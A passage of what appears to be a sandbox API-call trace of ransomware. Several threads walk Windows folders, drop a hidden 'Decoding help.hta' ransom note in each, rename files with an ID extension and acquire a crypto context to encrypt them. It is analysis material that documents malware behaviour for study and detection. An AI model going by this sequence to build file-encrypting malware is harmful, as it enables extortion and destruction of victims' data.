Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0056.647] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 89 [0056.647] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta" [0056.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\decoding help.hta")) returned 0xffffffff [0056.647] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c [0058.652] WriteFile (in: hFile=0x29c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ca9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ca9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.515] CloseHandle (hObject=0x29c) returned 1 [0060.802] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 724 os_tid = 0xf98 [0054.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*", lpFindFileData=0x1ce1fd30 | out: lpFindFileData=0x1ce1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd4548c0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8910 [0057.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.529] FindNextFileW (in: hFindFile=0x5d8910, lpFindFileData=0x1ce1fd30 | out: lpFindFileData=0x1ce1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd4548c0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.953] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.953] FindNextFileW (in: hFindFile=0x5d8910, lpFindFileData=0x1ce1fd30 | out: lpFindFileData=0x1ce1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0e4a00, ftCreationTime.dwHighDateTime=0x1bd5ead, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9b0e4a00, ftLastWriteTime.dwHighDateTime=0x1bd5ead, nFileSizeHigh=0x0, nFileSizeLow=0x3d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10219_.GIF", cAlternateFileName="")) returned 1 [0058.953] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*" [0058.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*") returned 62 [0058.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Decoding help.hta" [0058.953] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\decoding help.hta")) returned 0xffffffff [0059.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7a0 [0060.626] WriteFile (in: hFile=0x7a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ce1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ce1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.627] CloseHandle (hObject=0x7a0) returned 1 [0060.627] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.854] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BD10219_.GIF") returned 1 [0060.854] lstrlenW (lpString="BD10219_.GIF") returned 12 [0060.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*" [0060.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*") returned 62 [0060.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\", lpString2="BD10219_.GIF" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" [0060.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" [0060.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.[ID]g9uZrLhJaygpwRm1[ID]" [0060.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10219_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10219_.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10219_.gif.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb44 [0060.855] CreateFileMappingA (hFile=0xb44, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb38 [0060.855] CryptAcquireContextA (phProv=0x1ce1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 725 os_tid = 0xf9c [0054.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x1cf1fd30 | out: lpFindFileData=0x1cf1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2c476cb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3030 [0061.418] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.422] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cf1fd30 | out: lpFindFileData=0x1cf1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2c476cb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.533] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.534] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cf1fd30 | out: lpFindFileData=0x1cf1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x884c0c00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x884c0c00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x884c0c00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 Thread: id = 726 os_tid = 0xfa0 [0054.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x1de5fd30 | out: lpFindFileData=0x1de5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5d70 [0056.270] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.271] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0x1de5fd30 | out: lpFindFileData=0x1de5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.271] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.271] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.271] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0x1de5fd30 | out: lpFindFileData=0x1de5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0056.271] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0056.271] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0056.271] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0056.646] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0056.646] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 89 [0056.646] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0056.646] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" [0056.646] GlobalMemoryStatus (in: lpBuffer=0x1de5fd10 | out: lpBuffer=0x1de5fd10) [0056.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aae1018, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ac [0056.663] CloseHandle (hObject=0x7ac) returned 1 [0056.663] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0x1de5fd30 | out: lpFindFileData=0x1de5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0056.665] lstrcpyW (in: lpString1=0x2ab09090, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0056.665] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 89 [0056.665] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta" [0056.665] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\decoding help.hta")) returned 0xffffffff [0056.665] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0058.652] WriteFile (in: hFile=0x534, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1de5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1de5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.516] CloseHandle (hObject=0x534) returned 1 [0060.803] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 727 os_tid = 0xfa4 [0054.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x1df5fd30 | out: lpFindFileData=0x1df5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2c476cb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b868 [0061.422] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.422] FindNextFileW (in: hFindFile=0x10a4b868, lpFindFileData=0x1df5fd30 | out: lpFindFileData=0x1df5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2c476cb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.537] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.537] FindNextFileW (in: hFindFile=0x10a4b868, lpFindFileData=0x1df5fd30 | out: lpFindFileData=0x1df5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aae6600, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x8aae6600, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x8aae6600, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 Thread: id = 728 os_tid = 0xfa8 [0054.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*", lpFindFileData=0x1e99fd30 | out: lpFindFileData=0x1e99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xad0454c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xad0454c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671930 [0054.481] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.481] FindNextFileW (in: hFindFile=0x671930, lpFindFileData=0x1e99fd30 | out: lpFindFileData=0x1e99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xad0454c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xad0454c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.481] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.481] FindNextFileW (in: hFindFile=0x671930, lpFindFileData=0x1e99fd30 | out: lpFindFileData=0x1e99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e690a00, ftCreationTime.dwHighDateTime=0x1cac0be, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e690a00, ftLastWriteTime.dwHighDateTime=0x1cac0be, nFileSizeHigh=0x0, nFileSizeLow=0x193378, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0054.481] lstrcpyW (in: lpString1=0x11153b58, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*" [0054.481] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*") returned 89 [0054.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta" [0054.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\decoding help.hta")) returned 0xffffffff [0054.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0055.482] WriteFile (in: hFile=0x484, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e99fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e99fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.380] CloseHandle (hObject=0x484) returned 1 [0058.381] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.381] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FPSRVUTL.DLL") returned -1 [0058.381] lstrlenW (lpString="FPSRVUTL.DLL") returned 12 [0058.381] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*" [0058.381] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*") returned 89 [0058.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\", lpString2="FPSRVUTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" [0058.381] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" [0058.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), 